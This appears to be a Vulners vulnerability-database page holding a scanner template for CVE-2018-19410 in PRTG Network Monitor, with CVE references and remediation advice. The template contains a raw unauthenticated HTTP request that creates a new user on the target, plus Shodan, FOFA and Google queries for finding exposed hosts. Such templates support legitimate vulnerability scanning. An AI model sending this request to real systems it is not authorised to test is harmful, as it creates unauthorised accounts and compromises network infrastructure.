Vulners
Lucene search
PRTG Network Monitor - Local File Inclusion
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2018-19410 | 21 Nov 201800:00 | – | attackerkb |
 | CVE-2018-19410 | 13 Aug 202304:23 | – | circl |
 | Paessler PRTG Network Monitor Local File Inclusion Vulnerability | 4 Feb 202500:00 | – | cisa_kev |
 | CISA Adds Four Known Exploited Vulnerabilities to Catalog | 4 Feb 202512:00 | – | cisa |
 | PRTG Network Monitor File Inclusion Vulnerability | 22 Nov 201800:00 | – | cnvd |
 | CVE-2018-19410 | 21 Nov 201816:00 | – | cve |
 | CVE-2018-19410 | 21 Nov 201816:00 | – | cvelist |
 | CVE-2018-19410 | 21 Nov 201816:29 | – | nvd |
 | PRTG Network Monitor <= 18.2.39.1661 Multiple Vulnerabilities | 22 Nov 201800:00 | – | openvas |
 | CVE-2018-19410 | 21 Nov 201816:29 | – | osv |
10
id: CVE-2018-19410
info:
name: PRTG Network Monitor - Local File Inclusion
author: DhiyaneshDK
severity: critical
description: |
PRTG Network Monitor before 18.2.40.1683 allows remote unauthenticated attackers to create users with read-write privileges (including administrator). A remote unauthenticated user can craft an HTTP request and override attributes of the 'include' directive in /public/login.htm and perform a Local File Inclusion attack, by including /api/addusers and executing it. By providing the 'id' and 'users' parameters, an unauthenticated attacker can create a user with read-write privileges (including administrator).
impact: |
Unauthenticated attackers can create administrator users with full privileges via local file inclusion, leading to complete compromise of the monitoring system and access to network infrastructure.
remediation: |
Upgrade to PRTG Network Monitor version 18.2.40.1683 or later and ensure the /public directory is properly secured.
reference:
- https://global.ptsecurity.com/analytics/threatscape/pt-2018-24
- https://github.com/himash/CVE-2018-19410-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-19410
epss-score: 0.93002
epss-percentile: 0.99789
cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: paessler
product: prtg_network_monitor
shodan-query:
- http.favicon.hash:"-655683626"
- http.title:"prtg"
fofa-query:
- icon_hash=-655683626
- title="prtg"
google-query: intitle:"prtg"
tags: cve,cve2018,prtg,lfi,kev,vkev,vuln
variables:
username: "{{rand_base(6)}}"
http:
- raw:
- |
POST /public/login.htm?file=/api/addusers.htm HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}
id=200&users={{username}}
matchers-condition: and
matchers:
- type: word
words:
- 'Added 1 users'
- 'prtg'
part: body
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d851e0fc8e6f79eb1e24baab981cd1b8de9fbd184815b1afe2e28e17a290e49b022100a87b6e978d7492209ae3d2dcc449553959c78c505902a683462f446f0e998576:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.93002
SSVC